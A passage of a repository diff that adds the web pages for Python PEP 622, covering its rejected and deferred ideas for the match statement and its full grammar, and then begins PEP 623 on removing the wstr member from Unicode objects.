+
+

Don’t do this, use existing method dispatching mechanisms

+

We recognize that some of the use cases for the match statement overlap +with what can be done with traditional object-oriented programming (OOP) design +techniques using class inheritance. The ability to choose alternate +behaviors based on testing the runtime type of a match subject might +even seem heretical to strict OOP purists.

+

However, Python has always been a language that embraces a variety of +programming styles and paradigms. Classic Python design idioms such as +“duck”-typing go beyond the traditional OOP model.

+

We believe that there are important use cases where the use of match results +in a cleaner and more maintainable architecture. These use cases tend to +be characterized by a number of features:

+
    +
  • Algorithms which cut across traditional lines of data encapsulation. If an +algorithm is processing heterogeneous elements of different types (such as +evaluating or transforming an abstract syntax tree, or doing algebraic +manipulation of mathematical symbols), forcing the user to implement +the algorithm as individual methods on each element type results in +logic that is smeared across the entire codebase instead of being neatly +localized in one place (see the sketch after this list).
  • +
  • Program architectures where the set of possible data types is relatively +stable, but there is an ever-expanding set of operations to be performed +on those data types. Doing this in a strict OOP fashion requires constantly +adding new methods to both the base class and subclasses to support the new +methods, “polluting” the base class with lots of very specialized method +definitions, and causing widespread disruption and churn in the code. By +contrast, in a match-based dispatch, adding a new behavior merely +involves writing a new match statement.
  • +
  • OOP also does not handle dispatching based on the shape of an object, such +as the length of a tuple, or the presence of an attribute – instead any such +dispatching decision must be encoded into the object’s type. Shape-based +dispatching is particularly interesting when it comes to handling “duck”-typed +objects.
  • +
+
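As a sketch of the first point above (our illustration, not code from the PEP, with hypothetical Num and BinOp node classes), evaluating a small expression AST with match keeps the whole algorithm in one function:

from dataclasses import dataclass

@dataclass
class Num:
    value: float

@dataclass
class BinOp:
    op: str
    left: object
    right: object

def evaluate(node):
    # The entire evaluation algorithm lives in one place, instead of an
    # evaluate() method smeared across every node class.
    match node:
        case Num(value=v):
            return v
        case BinOp(op="+", left=l, right=r):
            return evaluate(l) + evaluate(r)
        case BinOp(op="*", left=l, right=r):
            return evaluate(l) * evaluate(r)
        case _:
            raise TypeError(f"unknown node: {node!r}")

# evaluate(BinOp("+", Num(1), BinOp("*", Num(2), Num(3))))  # -> 7.0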

Where OOP is clearly superior is in the opposite case: where the set of possible +operations is relatively stable and well-defined, but there is an ever-growing +set of data types to operate on. A classic example of this is UI widget toolkits, +where there is a fixed set of interaction types (repaint, mouse click, keypress, +and so on), but the set of widget types is constantly expanding as developers +invent new and creative user interaction styles. Adding a new kind of widget +is a simple matter of writing a new subclass, whereas with a match-based approach +you end up having to add a new case clause to many widespread match statements. +We therefore don’t recommend using match in such a situation.

+
+
+

Allow more flexible assignment targets instead

+

There was an idea to instead just generalize the iterable unpacking to much +more general assignment targets, instead of adding a new kind of statement. +This concept is known in some other languages as “irrefutable matches”. We +decided not to do this because inspection of real-life potential use cases +showed that in the vast majority of cases destructuring is related to an if +condition. Also many of those are grouped in a series of exclusive choices.

+
+
+

Make it an expression

+

In most other languages pattern matching is represented by an expression, not +a statement. But making it an expression would be inconsistent with other +syntactic choices in Python. All decision making logic is expressed almost +exclusively in statements, so we decided not to deviate from this.

+
+
+

Use a hard keyword

+

There were options to make match a hard keyword, or choose a different +keyword. Although using a hard keyword would simplify life for simple-minded +syntax highlighters, we decided not to use a hard keyword for several reasons:

+
    +
  • Most importantly, the new parser doesn’t require us to do this. Unlike +async, which caused hardships by being a soft keyword for a few releases, +here we can make match a permanent soft keyword.
  • +
  • match is so commonly used in existing code that making it a hard keyword +would break almost every existing program and would put the burden of fixing +code on many people who may not even benefit from the new syntax.
  • +
  • It is hard to find an alternative keyword that would not be commonly used +in existing programs as an identifier, and would still clearly reflect the +meaning of the statement.
  • +
+
+
+

Use as or | instead of case for case clauses

+

The pattern matching proposed here is a combination of multi-branch control +flow (in line with switch in Algol-derived languages or cond in Lisp) +and object-deconstruction as found in functional languages. While the proposed +keyword case highlights the multi-branch aspect, alternative keywords such +as as would equally be possible, highlighting the deconstruction aspect. +as or with, for instance, also have the advantage of already being +keywords in Python. However, since case as a keyword can only occur as a +leading keyword inside a match statement, it is easy for a parser to +distinguish between its use as a keyword or as a variable.

+

Other variants would use a symbol like | or =>, or go entirely without +special marker.

+

Since Python is a statement-oriented language in the tradition of Algol, and as +each composite statement starts with an identifying keyword, case seemed to +be most in line with Python’s style and traditions.

+
+
+

Use a flat indentation scheme

+

There was an idea to use an alternative indentation scheme, for example where +every case clause would not be indented with respect to the initial match +part:

+
match expression:
+case pattern_1:
+    ...
+case pattern_2:
+    ...
+
+
+

The motivation for flat indentation is that it saves some horizontal space. +However, it may look awkward to the eye of a Python programmer, because +everywhere else a colon is followed by an indent. It would also complicate life +for simple-minded code editors. Finally, the horizontal space issue can be +alleviated by allowing “half-indent” (i.e. two spaces instead of four) for +match statements.

+

In sample programs using match, written as part of the development of this +PEP, a noticeable improvement in code brevity is observed, more than making up +for the additional indentation level.

+

Another proposal considered was to use flat indentation but put the +expression on the line after match:, like this:

+
match:
+    expression
+case pattern_1:
+    ...
+case pattern_2:
+    ...
+
+
+

This was ultimately rejected because the first block would be a +novelty in Python’s grammar: a block whose only content is a single +expression rather than a sequence of statements.

+
+
+

Alternatives for constant value pattern

+

This is probably the trickiest item. Matching against some pre-defined +constants is very common, but the dynamic nature of Python also makes it +ambiguous with capture patterns. Five other alternatives were considered:

+
    +
  • Use some implicit rules. For example, if a name was defined in the global +scope, then it refers to a constant, rather than representing a +capture pattern:
    # Here, the name "spam" must be defined in the global scope (and
    +# not shadowed locally). "side" must be local.
    +
    +match entree[-1]:
    +    case spam: ...  # Compares entree[-1] == spam.
    +    case side: ...  # Assigns side = entree[-1].
    +
    +
    +

    This however can cause surprises and action at a distance if someone +defines an unrelated coinciding name before the match statement.

    +
  • +
  • Use a rule based on the case of a name. In particular, if the name +starts with a lowercase letter it would be a capture pattern, while if +it starts with uppercase it would refer to a constant:
    match entree[-1]:
    +    case SPAM: ...  # Compares entree[-1] == SPAM.
    +    case side: ...  # Assigns side = entree[-1].
    +
    +
    +

    This works well with the recommendations for naming constants from +PEP 8. The main objection is that there’s no other part of core +Python where the case of a name is semantically significant. +In addition, Python allows identifiers to use different scripts, +many of which (e.g. CJK) don’t have a case distinction.

    +
  • +
  • Use extra parentheses to indicate lookup semantics for a given name. For +example:
    match entree[-1]:
    +    case (spam): ...  # Compares entree[-1] == spam.
    +    case side: ...    # Assigns side = entree[-1].
    +
    +
    +

    This may be a viable option, but it can create some visual noise if used +often. Also honestly it looks pretty unusual, especially in nested contexts.

    +

    This also has the problem that we may want or need parentheses to +disambiguate grouping in patterns, e.g. in Point(x, y=(y := +complex())).

    +
  • +
  • Introduce a special symbol, for example ., ?, $, or ^ to +indicate that a given name is a value to be matched against, not +to be assigned to. An earlier version of this proposal used a +leading-dot rule:
    match entree[-1]:
    +    case .spam: ...  # Compares entree[-1] == spam.
    +    case side: ...   # Assigns side = entree[-1].
    +
    +
    +

    While potentially useful, it introduces strange-looking new syntax +without making the pattern syntax any more expressive. Indeed, +named constants can be made to work with the existing rules by +converting them to Enum types, or enclosing them in their own +namespace (considered by the authors to be one honking great idea):

    +
    match entree[-1]:
    +    case Sides.SPAM: ...  # Compares entree[-1] == Sides.SPAM.
    +    case side: ...        # Assigns side = entree[-1].
    +
    +
    +

    If needed, the leading-dot rule (or a similar variant) could be +added back later with no backward-compatibility issues.

    +
  • +
  • There was also an idea to make lookup semantics the default, and require +$ or ? to be used in capture patterns:
    match entree[-1]:
    +    case spam: ...   # Compares entree[-1] == spam.
    +    case side?: ...  # Assigns side = entree[-1].
    +
    +
    +

    There are a few issues with this:

    +
      +
    • Capture patterns are more common in typical code, so it is +undesirable to require special syntax for them.
    • +
    • The authors are not aware of any other language that adorns +captures in this way.
    • +
    • None of the proposed syntaxes have any precedent in Python; +no other place in Python that binds names (e.g. import, +def, for) uses special marker syntax.
    • +
    • It would break the syntactic parallels of the current grammar:
      match coords:
      +    case ($x, $y):
      +        return Point(x, y)  # Why not "Point($x, $y)"?
      +
      +
      +
    • +
    +
  • +
+

In the end, these alternatives were rejected because of the mentioned drawbacks.

+
+
+

Disallow float literals in patterns

+

Because of the inexactness of floats, an early version of this proposal +did not allow floating-point constants to be used as match patterns. Part +of the justification for this prohibition is that Rust does this.

+

However, during implementation, it was discovered that distinguishing between +float values and other types required extra code in the VM that would slow +matches generally. Given that Python and Rust are very different languages +with different user bases and underlying philosophies, it was felt that +allowing float literals would not cause too much harm, and would be less +surprising to users.

+
+
+

Range matching patterns

+

This would allow patterns such as 1...6. However, there are a host of +ambiguities:

+
    +
  • Is the range open, half-open, or closed? (I.e. is 6 included in the +above example or not?)
  • +
  • Does the range match a single number, or a range object?
  • +
  • Range matching is often used for character ranges (‘a’…’z’) but that +won’t work in Python since there’s no character data type, just strings.
  • +
  • Range matching can be a significant performance optimization if you can +pre-build a jump table, but that’s not generally possible in Python due +to the fact that names can be dynamically rebound.
  • +
+

Rather than creating a special-case syntax for ranges, it was decided +that allowing custom pattern objects (InRange(0, 6)) would be more flexible +and less ambiguous; however those ideas have been postponed for the time +being (See deferred ideas).
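For comparison, a hedged sketch (ours, not from the PEP) of how a guard covers the range use case today, without new pattern syntax:

def describe_roll(value):
    match value:
        case n if isinstance(n, int) and 1 <= n <= 6:
            # The guard answers the open/closed question explicitly.
            return f"die face {n}"
        case _:
            return "not a die face"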

+
+
+

Use dispatch dict semantics for matches

+

Implementations of the classic switch statement sometimes use a pre-computed +hash table instead of chained equality comparisons to gain some performance. +In the context of the match statement this is technically also possible for +matches against literal patterns. However, having subtly different semantics +for different kinds of patterns would be too surprising for a potentially +modest performance win.
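For illustration (our sketch, not the PEP’s), the dispatch-table technique alluded to above looks like this in Python; a match over literal patterns could in principle be compiled to something similar:

def handle(status):
    # Pre-computed hash table: a single dict lookup replaces chained
    # equality comparisons against 200, 404, and so on.
    handlers = {
        200: lambda: "ok",
        404: lambda: "not found",
    }
    return handlers.get(status, lambda: "other")()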

+

We can still experiment with possible performance optimizations in this +direction, provided they do not cause semantic differences.

+
+
+

Use continue and break in case clauses.

+

Another rejected proposal was to define new meanings for continue +and break inside of match, which would have the following behavior:

+
    +
  • continue would exit the current case clause and continue matching +at the next case clause.
  • +
  • break would exit the match statement.
  • +
+

However, there is a serious drawback to this proposal: if the match statement +is nested inside of a loop, the meanings of continue and break are now +changed. This may cause unexpected behavior during refactorings; also, an +argument can be made that there are other means to get the same behavior (such +as using guard conditions), and that in practice it’s likely that the existing +behavior of continue and break is far more useful.

+
+
+

AND (&) patterns

+

This proposal defines an OR-pattern (|) to match one of several alternates; +why not also an AND-pattern (&)? Especially given that some other languages +(F# for example) support this.

+

However, it’s not clear how useful this would be. The semantics for matching +dictionaries, objects and sequences already incorporates an implicit ‘and’: all +attributes and elements mentioned must be present for the match to succeed. Guard +conditions can also support many of the use cases that a hypothetical ‘and’ +operator would be used for.
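As a hedged sketch (our example, not from the PEP), a guard already expresses the conjunction that a hypothetical ‘and’ pattern would provide:

def quadrant(point):
    match point:
        case {"x": x, "y": y} if x > 0 and y > 0:
            # The mapping pattern is an implicit "and" over the keys;
            # the guard supplies the remaining conditions.
            return "first quadrant"
        case {"x": _, "y": _}:
            return "elsewhere"
        case _:
            return "not a point"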

+

In the end, it was decided that this would make the syntax more complex without +adding a significant benefit.

+
+
+

Negative match patterns

+

A negation of a match pattern using the operator ! as a prefix would match +exactly if the pattern itself does not match. For instance, !(3 | 4) +would match anything except 3 or 4.

+

This was rejected because there is documented evidence that this feature +is rarely useful (in languages which support it) or is used as double negation +!! to control variable scopes and prevent variable bindings (which does +not apply to Python). It can also be simulated using guard conditions.
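A minimal sketch (ours) of the guard-based simulation:

def check(value):
    match value:
        case x if x not in (3, 4):
            # Plays the role of the hypothetical !(3 | 4) pattern.
            return "anything except 3 or 4"
        case _:
            return "three or four"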

+
+
+

Check exhaustiveness at runtime

+

The question is what to do if no case clause has a matching pattern, and +there is no default case. An earlier version of the proposal specified that +the behavior in this case would be to throw an exception rather than +silently falling through.

+

The arguments back and forth were many, but in the end the EIBTI (Explicit +Is Better Than Implicit) argument won out: it’s better to have the programmer +explicitly throw an exception if that is the behavior they want.
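Concretely (our sketch, not from the PEP), a programmer who wants a hard failure on an unmatched subject writes it explicitly:

def handle(command):
    match command:
        case "start" | "stop":
            return f"handled {command}"
        case _:
            # Explicit is better than implicit: no silent fall-through.
            raise ValueError(f"unhandled command: {command!r}")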

+

For cases such as sealed classes and enums, where the patterns are all known +to be members of a discrete set, static checkers can warn about missing +patterns.

+
+
+

Type annotations for pattern variables

+

The proposal was to combine patterns with type annotations:

+
match x:
+    case [a: int, b: str]: print(f"An int {a} and a string {b}")
+    case [a: int, b: int, c: int]: print("Three ints", a, b, c)
+    ...
+
+
+

This idea has a lot of problems. For one, the colon can only +be used inside of brackets or parens, otherwise the syntax becomes +ambiguous. And because Python disallows isinstance() checks +on generic types, type annotations containing generics will not +work as expected.

+
+
+

Allow *rest in class patterns

+

It was proposed to allow *rest in a class pattern, giving a +variable to be bound to all positional arguments at once (similar to +its use in unpacking assignments). It would provide some symmetry +with sequence patterns. But it might be confused with a feature to +provide the values for all positional arguments at once. And there +seems to be no practical need for it, so it was scrapped. (It could +easily be added at a later stage if a need arises.)

+
+
+

Disallow _.a in constant value patterns

+

The first public draft said that the initial name in a constant value +pattern must not be _ because _ has a special meaning in +pattern matching, so this would be invalid:

+
case _.a: ...
+
+
+

(However, a._ would be legal and load the attribute with name +_ of the object a as usual.)

+

There was some pushback against this on python-dev (some people have a +legitimate use for _ as an important global variable, esp. in +i18n) and the only reason for this prohibition was to prevent some +user confusion. But it’s not the hill to die on.

+
+
+

Use some other token as wildcard

+

It has been proposed to use ... (i.e., the ellipsis token) or +* (star) as a wildcard. However, both these look as if an +arbitrary number of items is omitted:

+
case [a, ..., z]: ...
+case [a, *, z]: ...
+
+
+

Both look as if they would match a sequence of two or more items, +capturing the first and last values.

+

In addition, if * were to be used as the wildcard character, we +would have to come up with some other way to capture the rest of a +sequence, currently spelled like this:

+
case [first, second, *rest]: ...
+
+
+

Using an ellipsis would also be more confusing in documentation and +examples, where ... is routinely used to indicate something +obvious or irrelevant. (Yes, this would also be an argument against +the other uses of ... in Python, but that water is already under +the bridge.)

+

Another proposal was to use ?. This could be acceptable, although +it would require modifying the tokenizer.

+

Also, _ is already used +as a throwaway target in other contexts, and this use is pretty +similar. This example is from difflib.py in the stdlib:

+
for tag, _, _, j1, j2 in group: ...
+
+
+

Perhaps the most convincing argument is that _ is used as the +wildcard in every other language we’ve looked at supporting pattern +matching: C#, Elixir, Erlang, F#, Haskell, Mathematica, OCaml, Ruby, +Rust, Scala, and Swift. Now, in general, we should not be concerned +too much with what another language does, since Python is clearly +different from all these languages. However, if there is such an +overwhelming and strong consensus, Python should not go out of its way +to do something completely different – particularly given that _ +works well in Python and is already in use as a throwaway target.

+

Note that _ is not assigned to by patterns – this avoids +conflicts with the use of _ as a marker for translatable strings +and an alias for gettext.gettext, as recommended by the +gettext module documentation.

+
+
+

Use some other syntax instead of | for OR patterns

+

A few alternatives to using | to separate the alternatives in OR +patterns have been proposed. Instead of:

+
case 401|403|404:
+    print("Some HTTP error")
+
+
+

the following proposals have been fielded:

+
    +
  • Use a comma:
    case 401, 403, 404:
    +  print("Some HTTP error")
    +
    +
    +

    This looks too much like a tuple – we would have to find a +different way to spell tuples, and the construct would have to be +parenthesized inside the argument list of a class pattern. In +general, commas already have many different meanings in Python; we +shouldn’t add more.

    +
  • +
  • Allow stacked cases:
    case 401:
    +case 403:
    +case 404:
    +  print("Some HTTP error")
    +
    +
    +

    This is how this would be done in C, using its fall-through +semantics for cases. However, we don’t want to mislead people into +thinking that match/case uses fall-through semantics (which +are a common source of bugs in C). Also, this would be a novel +indentation pattern, which might make it harder to support in IDEs +and such (it would break the simple rule “add an indentation level +after a line ending in a colon”). Finally, this wouldn’t support +OR patterns nested inside other patterns.

    +
  • +
  • Use case in followed by a comma-separated list:
    case in 401, 403, 404:
    +  print("Some HTTP error")
    +
    +
    +

    This wouldn’t work for OR patterns nested inside other patterns, +like:

    +
    case Point(0|1, 0|1):
    +    print("A corner of the unit square")
    +
    +
    +
  • +
  • Use the or keyword:
    case 401 or 403 or 404:
    +    print("Some HTTP error")
    +
    +
    +

    This could work, and the readability is not too different from using +|. Some users expressed a preference for or because they +associate | with bitwise OR. However:

    +
      +
    1. Many other languages that have pattern matching use | (the +list includes Elixir, Erlang, F#, Mathematica, OCaml, Ruby, Rust, +and Scala).
    +
    2. | is shorter, which may contribute to the readability of +nested patterns like Point(0|1, 0|1).
    +
    3. Some people mistakenly believe that | has the wrong priority; +but since patterns don’t support other operators it has the same +priority as in expressions.
    +
    4. Python users use or very frequently, and may build an +impression that it is strongly associated with Boolean +short-circuiting.
    +
    5. | is used between alternatives in regular expressions +and in EBNF grammars (like Python’s own).
    +
    6. | is not just used for bitwise OR – it’s used for set unions, +dict merging (PEP 584) and is being considered as an +alternative to typing.Union (PEP 604).
    +
    7. | works better as a visual separator, especially between +strings. Compare:
      case "spam" or "eggs" or "cheese":
      +
      +
      +

      to:

      +
      case "spam" | "eggs" | "cheese":
      +
      +
      +
    +
    +
  • +
+
+
+

Add an else clause

+

We decided not to add an else clause for several reasons.

+
    +
  • It is redundant, since we already have case _:
  • +
  • There will forever be confusion about the indentation level of the +else: – should it align with the list of cases or with the +match keyword?
  • +
  • Completionist arguments like “every other statement has one” are +false – only those statements have an else clause where it adds +new functionality.
  • +
+
+
+
+

Deferred Ideas

+

There were a number of proposals to extend the matching syntax that we +decided to postpone for a possible future PEP. These fall into the realm of +“cool idea but not essential”, and it was felt that it might be better to +acquire some real-world data on how the match statement will be used in +practice before moving forward with some of these proposals.

+

Note that in each case, the idea was judged to be a “two-way door”, +meaning that there should be no backwards-compatibility issues with adding +these features later.

+
+

One-off syntax variant

+

While inspecting some code-bases that may benefit the most from the proposed +syntax, it was found that single clause matches would be used relatively often, +mostly for various special-casing. In other languages this is supported in +the form of one-off matches. We proposed to support such one-off matches too:

+
if match value as pattern [and guard]:
+    ...
+
+
+

or, alternatively, without the if:

+
match value as pattern [if guard]:
+    ...
+
+
+

as equivalent to the following expansion:

+
match value:
+    case pattern [if guard]:
+        ...
+
+
+

To illustrate how this will benefit readability, consider this (slightly +simplified) snippet from real code:

+
if isinstance(node, CallExpr):
+    if (isinstance(node.callee, NameExpr) and len(node.args) == 1 and
+            isinstance(node.args[0], NameExpr)):
+        call = node.callee.name
+        arg = node.args[0].name
+        ...  # Continue special-casing 'call' and 'arg'
+...  # Follow with common code
+
+
+

This can be rewritten in a more straightforward way as:

+
if match node as CallExpr(callee=NameExpr(name=call), args=[NameExpr(name=arg)]):
+    ...  # Continue special-casing 'call' and 'arg'
+...  # Follow with common code
+
+
+

This one-off form would not allow elif match statements, as it was only +meant to handle a single pattern case. It was intended to be special case +of a match statement, not a special case of an if statement:

+
if match value_1 as pattern_1 [and guard_1]:
+    ...
+elif match value_2 as pattern_2 [and guard_2]:  # Not allowed
+    ...
+elif match value_3 as pattern_3 [and guard_3]:  # Not allowed
+    ...
+else:  # Also not allowed
+    ...
+
+
+

This would defeat the purpose of one-off matches as a complement to exhaustive +full matches – it’s better and clearer to use a full match in this case.

+

Similarly, if not match would not be allowed, since match ... as ... is not +an expression. Nor do we propose a while match construct present in some languages +with pattern matching, since although it may be handy, it will likely be used +rarely.

+
+
+

Other pattern-based constructions

+

Many other languages supporting pattern-matching use it as a basis for multiple +language constructs, including a matching operator, a generalized form +of assignment, a filter for loops, a method for synchronizing communication, +or specialized if statements. Some of these were mentioned in the discussion +of the first draft. Another question asked was why this particular form (joining +binding and conditional selection) was chosen while other forms were not.

+

Introducing more uses of patterns would be too bold and premature given how +little experience we have using patterns, and would make this proposal too +complicated. The statement as presented provides a form of the feature that +is sufficiently general to be useful while being self-contained, and without +having a massive impact on the syntax and semantics of the language as a whole.

+

After some experience with this feature, the community may have a better +feeling for what other uses of pattern matching could be valuable in Python.

+
+
+

Algebraic matching of repeated names

+

A technique occasionally seen in functional languages like Erlang and Elixir is +to use a match variable multiple times in the same pattern:

+
match value:
+    case Point(x, x):
+        print("Point is on a diagonal!")
+
+
+

The idea here is that the first appearance of x would bind the value +to the name, and subsequent occurrences would verify that the incoming +value was equal to the value previously bound. If the value was not equal, +the match would fail.

+

However, there are a number of subtleties involved with mixing load-store +semantics for capture patterns. For the moment, we decided to make repeated +use of names within the same pattern an error; we can always relax this +restriction later without affecting backwards compatibility.
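A sketch (ours, using a hypothetical Point class) of the guard-based workaround while the restriction stands:

from dataclasses import dataclass

@dataclass
class Point:
    x: int
    y: int

def on_diagonal(value):
    match value:
        case Point(x=a, y=b) if a == b:
            # Bind to two distinct names, then compare in the guard.
            return True
        case _:
            return False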

+

Note that you can use the same name more than once in alternate choices:

+
match value:
+    case x | [x]:
+        # etc.
+
+
+
+
+

Custom matching protocol

+

During the initial design discussions for this PEP, there were a lot of ideas +thrown around about custom matchers. There were a couple of motivations for +this:

+
    +
  • Some classes might want to expose a different set of “matchable” names +than the actual class properties.
  • +
  • Some classes might have properties that are expensive to calculate, and +therefore shouldn’t be evaluated unless the match pattern actually needed +access to them.
  • +
  • There were ideas for exotic matchers such as IsInstance(), +InRange(), RegexMatchingGroup() and so on.
  • +
  • In order for built-in types and standard library classes to be able +to support matching in a reasonable and intuitive way, it was believed +that these types would need to implement special matching logic.
  • +
+

These customized match behaviors would be controlled by a special +__match__ method on the class name. There were two competing variants:

+
    +
  • A ‘full-featured’ match protocol which would pass in not only +the subject to be matched, but detailed information about +which attributes the specified pattern was interested in.
  • +
  • A simplified match protocol, which only passed in the subject value, +and which returned a “proxy object” (which in most cases could be +just the subject) containing the matchable attributes.
  • +
+

Here’s an example of one version of the more complex protocol proposed:

+
match expr:
+    case BinaryOp(left=Number(value=x), op=op, right=Number(value=y)):
+        ...
+
+from types import PatternObject
+BinaryOp.__match__(
+    (),
+    {
+        "left": PatternObject(Number, (), {"value": ...}, -1, False),
+        "op": ...,
+        "right": PatternObject(Number, (), {"value": ...}, -1, False),
+    },
+    -1,
+    False,
+)
+
+
+

One drawback of this protocol is that the arguments to __match__ +would be expensive to construct, and could not be pre-computed due to +the fact that, because of the way names are bound, there are no real +constants in Python. It also meant that the __match__ method would +have to re-implement much of the logic of matching which would otherwise +be implemented in C code in the Python VM. As a result, this option would +perform poorly compared to an equivalent if-statement.

+

The simpler protocol suffered from the fact that although it was more +performant, it was much less flexible, and did not allow for many of +the creative custom matchers that people were dreaming up.

+

Late in the design process, however, it was realized that the need for +a custom matching protocol was much less than anticipated. Virtually +all the realistic (as opposed to fanciful) use cases brought up could +be handled by the built-in matching behavior, although in a few cases +an extra guard condition was required to get the desired effect.

+

Moreover, it turned out that none of the standard library classes really +needed any special matching support other than an appropriate +__match_args__ property.
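For instance (our sketch, not code from the PEP), a plain class opts into positional class patterns with nothing more than __match_args__:

class Color:
    __match_args__ = ("red", "green", "blue")

    def __init__(self, red, green, blue):
        self.red, self.green, self.blue = red, green, blue

def is_pure_red(color):
    match color:
        case Color(255, 0, 0):  # positions map to attributes via __match_args__
            return True
        case _:
            return False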

+

The decision to postpone this feature came with a realization that this is +not a one-way door; that a more flexible and customizable matching protocol +can be added later, especially as we gain more experience with real-world +use cases and actual user needs.

+

The authors of this PEP expect that the match statement will evolve +over time as usage patterns and idioms evolve, in a way similar to what +other “multi-stage” PEPs have done in the past. When this happens, the +extended matching issue can be revisited.

+
+
+

Parameterized Matching Syntax

+

(Also known as “Class Instance Matchers”.)

+

This is another variant of the “custom match classes” idea that would allow +diverse kinds of custom matchers mentioned in the previous section – however, +instead of using an extended matching protocol, it would be achieved by +introducing an additional pattern type with its own syntax. This pattern type +would accept two distinct sets of parameters: one set which consists of the +actual parameters passed into the pattern object’s constructor, and another +set representing the binding variables for the pattern.

+

The __match__ method of these objects could use the constructor parameter +values in deciding what was a valid match.

+

This would allow patterns such as InRange<0, 6>(value), which would match +a number in the range 0..6 and assign the matched value to ‘value’. Similarly, +one could have a pattern which tests for the existence of a named group in +a regular expression match result (different meaning of the word ‘match’).

+

Although there is some support for this idea, there was a lot of bikeshedding +on the syntax (there are not a lot of attractive options available) +and no clear consensus was reached, so it was decided that for now, this +feature is not essential to the PEP.

+
+
+

Pattern Utility Library

+

Both of the previous ideas would be accompanied by a new Python standard +library module which would contain a rich set of useful matchers. +However, it is not really possible to implement such a library without +adopting one of the extended pattern proposals given in the previous sections, +so this idea is also deferred.

+
+
+
+

Acknowledgments

+

We are grateful for the help of the following individuals (among many +others) for helping out during various phases of the writing of this +PEP:

+
    +
  • Gregory P. Smith
  • +
  • Jim Jewett
  • +
  • Mark Shannon
  • +
  • Nate Lust
  • +
  • Taine Zhao
  • +
+
+
+

Version History

+
    +
  1. Initial version
  +
  2. Substantial rewrite, including:
      +
    • Minor clarifications, grammar and typo corrections
    • +
    • Rename various concepts
    • +
    • Additional discussion of rejected ideas, including:
        +
      • Why we choose _ for wildcard patterns
      • +
      • Why we choose | for OR patterns
      • +
      • Why we choose not to use special syntax for capture variables
      • +
      • Why this pattern matching operation and not others
      • +
      +
    • +
    • Clarify exception and side effect semantics
    • +
    • Clarify partial binding semantics
    • +
    • Drop restriction on use of _ in load contexts
    • +
    • Drop the default single positional argument being the whole +subject except for a handful of built-in types
    • +
    • Simplify behavior of __match_args__
    • +
    • Drop the __match__ protocol (moved to deferred ideas)
    • +
    • Drop ImpossibleMatchError exception
    • +
    • Drop leading dot for loads (moved to deferred ideas)
    • +
    • Reworked the initial sections (everything before syntax)
    • +
    • Added an overview of all the types of patterns before the +detailed description
    • +
    • Added simplified syntax next to the description of each pattern
    • +
    • Separate description of the wildcard from capture patterns
    • +
    • Added Daniel F Moisset as sixth co-author
    • +
    +
  +
+
+
+

References

+ +
+
+

Appendix A – Full Grammar

+

Here is the full grammar for match_stmt. This is an additional +alternative for compound_stmt. It should be understood that +match and case are soft keywords, i.e. they are not reserved +words in other grammatical contexts (including at the start of a line +if there is no colon where expected). By convention, hard keywords +use single quotes while soft keywords use double quotes.

+

Other notation used beyond standard EBNF:

+
    +
  • SEP.RULE+ is shorthand for RULE (SEP RULE)*
  • +
  • !RULE is a negative lookahead assertion
  • +
+
match_expr:
+    | star_named_expression ',' star_named_expressions?
+    | named_expression
+match_stmt: "match" match_expr ':' NEWLINE INDENT case_block+ DEDENT
+case_block: "case" patterns [guard] ':' block
+guard: 'if' named_expression
+patterns: value_pattern ',' [values_pattern] | pattern
+pattern: walrus_pattern | or_pattern
+walrus_pattern: NAME ':=' or_pattern
+or_pattern: '|'.closed_pattern+
+closed_pattern:
+    | capture_pattern
+    | literal_pattern
+    | constant_pattern
+    | group_pattern
+    | sequence_pattern
+    | mapping_pattern
+    | class_pattern
+capture_pattern: NAME !('.' | '(' | '=')
+literal_pattern:
+    | signed_number !('+' | '-')
+    | signed_number '+' NUMBER
+    | signed_number '-' NUMBER
+    | strings
+    | 'None'
+    | 'True'
+    | 'False'
+constant_pattern: attr !('.' | '(' | '=')
+group_pattern: '(' patterns ')'
+sequence_pattern: '[' [values_pattern] ']' | '(' ')'
+mapping_pattern: '{' items_pattern? '}'
+class_pattern:
+    | name_or_attr '(' ')'
+    | name_or_attr '(' ','.pattern+ ','? ')'
+    | name_or_attr '(' ','.keyword_pattern+ ','? ')'
+    | name_or_attr '(' ','.pattern+ ',' ','.keyword_pattern+ ','? ')'
+signed_number: NUMBER | '-' NUMBER
+attr: name_or_attr '.' NAME
+name_or_attr: attr | NAME
+values_pattern: ','.value_pattern+ ','?
+items_pattern: ','.key_value_pattern+ ','?
+keyword_pattern: NAME '=' or_pattern
+value_pattern: '*' capture_pattern | pattern
+key_value_pattern:
+    | (literal_pattern | constant_pattern) ':' or_pattern
+    | '**' capture_pattern
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0622.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0623/index.html b/pep-0623/index.html new file mode 100644 index 00000000000..082dee4547b --- /dev/null +++ b/pep-0623/index.html @@ -0,0 +1,321 @@ + + + + + + + + PEP 623 – Remove wstr from Unicode | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 623 – Remove wstr from Unicode

+
+
Author:
+
Inada Naoki <songofacandy at gmail.com>
+
BDFL-Delegate:
+
Victor Stinner <vstinner at python.org>
+
Discussions-To:
+
Python-Dev thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
25-Jun-2020
+
Python-Version:
+
3.10
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 393 deprecated some unicode APIs, and introduced wchar_t *wstr, +and Py_ssize_t wstr_length in the Unicode structure to support +these deprecated APIs.

+

This PEP plans the removal of wstr and wstr_length, along with the +deprecated APIs that use these members, by Python 3.12.

+

Deprecated APIs which don’t use these members are out of scope, because +they can be removed independently.

+
+
+

Motivation

+
+

Memory usage

+

str is one of the most used types in Python. Even the most simple ASCII +strings have a wstr member. It consumes 8 bytes per string on 64-bit +systems.

+
+
+

Runtime overhead

+

To support legacy Unicode objects, many Unicode APIs must call +PyUnicode_READY().

+

We can remove this overhead too by dropping support for legacy Unicode +objects.

+
+
+

Simplicity

+

Supporting legacy Unicode objects makes the Unicode implementation more +complex. +Until we drop legacy Unicode objects, it is very hard to try another +Unicode implementation, such as the UTF-8 based implementation in PyPy.

+
+
+
+

Rationale

+
+

Python 4.0 is not scheduled yet

+

PEP 393 introduced an efficient internal representation of Unicode and +removed the border between the “narrow” and “wide” builds of Python.

+

